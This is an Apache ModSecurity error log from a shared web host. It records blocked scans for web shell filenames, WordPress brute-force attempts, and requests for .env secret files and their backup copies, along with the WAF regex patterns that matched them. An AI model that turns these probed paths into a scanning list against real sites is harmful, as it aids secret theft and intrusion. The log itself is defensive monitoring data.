[Tue May 26 15:47:55.960608 2026] [security2:error] [pid 745492:tid 745687] [client 4.193.189.92:2781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/sts.php"] [unique_id "ahVzU4mEQglTmoWcfxJ2JgAAAMM"]
[Tue May 26 15:47:56.182862 2026] [security2:error] [pid 747840:tid 748045] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzU4m6MwAuYuZKxvnoWQAAAVU"]
[Tue May 26 15:47:56.413200 2026] [security2:error] [pid 747840:tid 748067] [client 14.230.35.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzU4m6MwAuYuZKxvnoXQAAAWs"]
[Tue May 26 15:47:56.734239 2026] [security2:error] [pid 747840:tid 748046] [client 4.193.189.92:10991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/shell.php"] [unique_id "ahVzVIm6MwAuYuZKxvnoYwAAAVY"]
[Tue May 26 15:47:57.486083 2026] [security2:error] [pid 745492:tid 745686] [client 4.193.189.92:13114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/setup-config.php"] [unique_id "ahVzVYmEQglTmoWcfxJ2QgAAAMI"]
[Tue May 26 15:47:57.864354 2026] [security2:error] [pid 747840:tid 747988] [client 143.110.243.118:47548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/p7m94.php"] [unique_id "ahVzVYm6MwAuYuZKxvnocAAAARw"]
[Tue May 26 15:47:58.152594 2026] [security2:error] [pid 745492:tid 745751] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzVYmEQglTmoWcfxJ2QwAAAQM"]
[Tue May 26 15:47:58.263527 2026] [security2:error] [pid 747840:tid 748064] [client 4.193.189.92:3666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/t.php"] [unique_id "ahVzVom6MwAuYuZKxvnoeAAAAWg"]
[Tue May 26 15:47:59.021047 2026] [security2:error] [pid 747840:tid 748096] [client 103.153.130.62:64105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzV4m6MwAuYuZKxvnohwAAAYg"]
[Tue May 26 15:47:59.021169 2026] [security2:error] [pid 747840:tid 748096] [client 103.153.130.62:64105] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzV4m6MwAuYuZKxvnohwAAAYg"]
[Tue May 26 15:47:59.227580 2026] [autoindex:error] [pid 747840:tid 748000] [client 42.83.147.54:2131] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:47:59.906730 2026] [security2:error] [pid 747840:tid 748074] [client 4.193.189.92:4702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/up.php"] [unique_id "ahVzV4m6MwAuYuZKxvnomAAAAXI"]
[Tue May 26 15:48:00.349588 2026] [security2:error] [pid 747840:tid 748042] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzV4m6MwAuYuZKxvnomgAAAVI"]
[Tue May 26 15:48:00.681580 2026] [security2:error] [pid 745492:tid 745648] [client 4.193.189.92:9338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ultra.php"] [unique_id "ahVzWImEQglTmoWcfxJ2dAAAAJw"]
[Tue May 26 15:48:00.736844 2026] [security2:error] [pid 747840:tid 747975] [client 223.123.35.44:36220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzWIm6MwAuYuZKxvnopQAAAQ8"]
[Tue May 26 15:48:00.743447 2026] [security2:error] [pid 747840:tid 747975] [client 223.123.35.44:36220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzWIm6MwAuYuZKxvnopQAAAQ8"]
[Tue May 26 15:48:00.787266 2026] [autoindex:error] [pid 747840:tid 748025] [client 42.83.147.54:2139] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:48:01.402871 2026] [security2:error] [pid 745492:tid 745626] [client 4.193.189.92:9311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/vv.php"] [unique_id "ahVzWYmEQglTmoWcfxJ2egAAAIY"]
[Tue May 26 15:48:01.722797 2026] [security2:error] [pid 745492:tid 745551] [remote 14.161.17.36:58170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVzWYmEQglTmoWcfxJ2fQAAyTc"]
[Tue May 26 15:48:02.153025 2026] [security2:error] [pid 745492:tid 745686] [client 4.193.189.92:5558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/V5.php"] [unique_id "ahVzWomEQglTmoWcfxJ2gwAAAMI"]
[Tue May 26 15:48:02.704055 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzWom6MwAuYuZKxvnouQAAAVs"]
[Tue May 26 15:48:02.862459 2026] [security2:error] [pid 745492:tid 745653] [client 4.193.189.92:9331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp-user.php"] [unique_id "ahVzWomEQglTmoWcfxJ2jQAAAKE"]
[Tue May 26 15:48:03.161761 2026] [security2:error] [pid 747840:tid 748090] [client 207.241.173.116:9618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env"] [unique_id "ahVzW4m6MwAuYuZKxvnoyQAAAYI"]
[Tue May 26 15:48:03.162120 2026] [security2:error] [pid 747840:tid 748055] [client 207.241.173.116:9644] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/api/.env"] [unique_id "ahVzW4m6MwAuYuZKxvnowwAAAV8"]
[Tue May 26 15:48:03.162286 2026] [security2:error] [pid 747840:tid 748003] [client 207.241.173.116:9640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/app/.env"] [unique_id "ahVzW4m6MwAuYuZKxvnoyAAAASs"]
[Tue May 26 15:48:03.164974 2026] [security2:error] [pid 745492:tid 745660] [client 207.241.173.116:9658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/backend/.env"] [unique_id "ahVzW4mEQglTmoWcfxJ2oQAAAKg"]
[Tue May 26 15:48:03.604564 2026] [security2:error] [pid 745492:tid 745690] [client 4.193.189.92:9409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp-blog.php"] [unique_id "ahVzW4mEQglTmoWcfxJ2qQAAAMY"]
[Tue May 26 15:48:04.328535 2026] [security2:error] [pid 747840:tid 748006] [client 4.193.189.92:2433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp.php"] [unique_id "ahVzXIm6MwAuYuZKxvno4AAAAS4"]
[Tue May 26 15:48:04.492939 2026] [security2:error] [pid 747840:tid 748029] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzXIm6MwAuYuZKxvno2AAAAUU"]
[Tue May 26 15:48:05.056127 2026] [security2:error] [pid 747840:tid 748010] [client 4.193.189.92:5315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/worksec.php"] [unique_id "ahVzXYm6MwAuYuZKxvno6gAAATI"]
[Tue May 26 15:48:05.761826 2026] [security2:error] [pid 747840:tid 747990] [client 207.241.173.116:9710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.copy"] [unique_id "ahVzXYm6MwAuYuZKxvno8gAAAR4"]
[Tue May 26 15:48:05.814156 2026] [security2:error] [pid 747840:tid 748095] [client 4.193.189.92:6267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp-themes.php"] [unique_id "ahVzXYm6MwAuYuZKxvno9AAAAYc"]
[Tue May 26 15:48:06.339889 2026] [security2:error] [pid 747840:tid 747868] [remote 103.11.102.106:36260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVzXom6MwAuYuZKxvno-gABShs"]
[Tue May 26 15:48:06.447983 2026] [security2:error] [pid 747840:tid 748001] [client 85.208.96.197:30324] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVzXom6MwAuYuZKxvnpAAAAASk"]
[Tue May 26 15:48:06.448136 2026] [security2:error] [pid 747840:tid 748001] [client 85.208.96.197:30324] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVzXom6MwAuYuZKxvnpAAAAASk"]
[Tue May 26 15:48:06.548370 2026] [security2:error] [pid 745492:tid 745747] [client 4.193.189.92:9186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp-signin.php"] [unique_id "ahVzXomEQglTmoWcfxJ2yAAAAP8"]
[Tue May 26 15:48:06.556300 2026] [security2:error] [pid 747840:tid 748055] [client 207.241.173.116:37284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.old"] [unique_id "ahVzXom6MwAuYuZKxvnpBQAAAV8"]
[Tue May 26 15:48:06.556590 2026] [security2:error] [pid 747840:tid 748059] [client 207.241.173.116:9808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.bak"] [unique_id "ahVzXom6MwAuYuZKxvnpBAAAAWM"]
[Tue May 26 15:48:06.557941 2026] [security2:error] [pid 747840:tid 748019] [client 207.241.173.116:37234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.backup"] [unique_id "ahVzXom6MwAuYuZKxvnpCQAAATs"]
[Tue May 26 15:48:06.558467 2026] [security2:error] [pid 745492:tid 745663] [client 207.241.173.116:37274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.orig"] [unique_id "ahVzXomEQglTmoWcfxJ2yQAAAKs"]
[Tue May 26 15:48:06.558774 2026] [security2:error] [pid 747840:tid 748073] [client 207.241.173.116:37082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.backup"] [unique_id "ahVzXom6MwAuYuZKxvnpDAAAAXE"]
[Tue May 26 15:48:06.558808 2026] [security2:error] [pid 747840:tid 748059] [client 207.241.173.116:37102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.swp"] [unique_id "ahVzXom6MwAuYuZKxvnpDQAAAWM"]
[Tue May 26 15:48:06.559378 2026] [security2:error] [pid 747840:tid 748015] [client 207.241.173.116:37214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.bak"] [unique_id "ahVzXom6MwAuYuZKxvnpCgAAATc"]
[Tue May 26 15:48:06.559582 2026] [security2:error] [pid 747840:tid 748091] [client 207.241.173.116:37198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.copy"] [unique_id "ahVzXom6MwAuYuZKxvnpDwAAAYM"]
[Tue May 26 15:48:06.560461 2026] [security2:error] [pid 747840:tid 748052] [client 207.241.173.116:37134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.bak"] [unique_id "ahVzXom6MwAuYuZKxvnpEQAAAVw"]
[Tue May 26 15:48:06.560643 2026] [security2:error] [pid 747840:tid 748080] [client 207.241.173.116:37226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.old"] [unique_id "ahVzXom6MwAuYuZKxvnpEAAAAXg"]
[Tue May 26 15:48:06.560842 2026] [security2:error] [pid 747840:tid 747991] [client 207.241.173.116:37094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env~"] [unique_id "ahVzXom6MwAuYuZKxvnpEwAAAR8"]
[Tue May 26 15:48:06.561502 2026] [security2:error] [pid 747840:tid 748065] [client 207.241.173.116:37146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.backup"] [unique_id "ahVzXom6MwAuYuZKxvnpEgAAAWk"]
[Tue May 26 15:48:06.563066 2026] [security2:error] [pid 747840:tid 748074] [client 207.241.173.116:37168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local~"] [unique_id "ahVzXom6MwAuYuZKxvnpFAAAAXI"]
[Tue May 26 15:48:06.563135 2026] [security2:error] [pid 747840:tid 747981] [client 207.241.173.116:37108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.orig"] [unique_id "ahVzXom6MwAuYuZKxvnpDgAAARU"]
[Tue May 26 15:48:06.563392 2026] [security2:error] [pid 747840:tid 747972] [client 207.241.173.116:37120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.copy"] [unique_id "ahVzXom6MwAuYuZKxvnpFgAAAQw"]
[Tue May 26 15:48:06.563525 2026] [security2:error] [pid 747840:tid 748032] [client 207.241.173.116:37138] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.old"] [unique_id "ahVzXom6MwAuYuZKxvnpFQAAAUg"]
[Tue May 26 15:48:06.563563 2026] [security2:error] [pid 747840:tid 748053] [client 207.241.173.116:37172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.swp"] [unique_id "ahVzXom6MwAuYuZKxvnpGAAAAV0"]
[Tue May 26 15:48:06.563650 2026] [security2:error] [pid 745492:tid 745631] [client 207.241.173.116:37188] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.local.orig"] [unique_id "ahVzXomEQglTmoWcfxJ2ywAAAIs"]
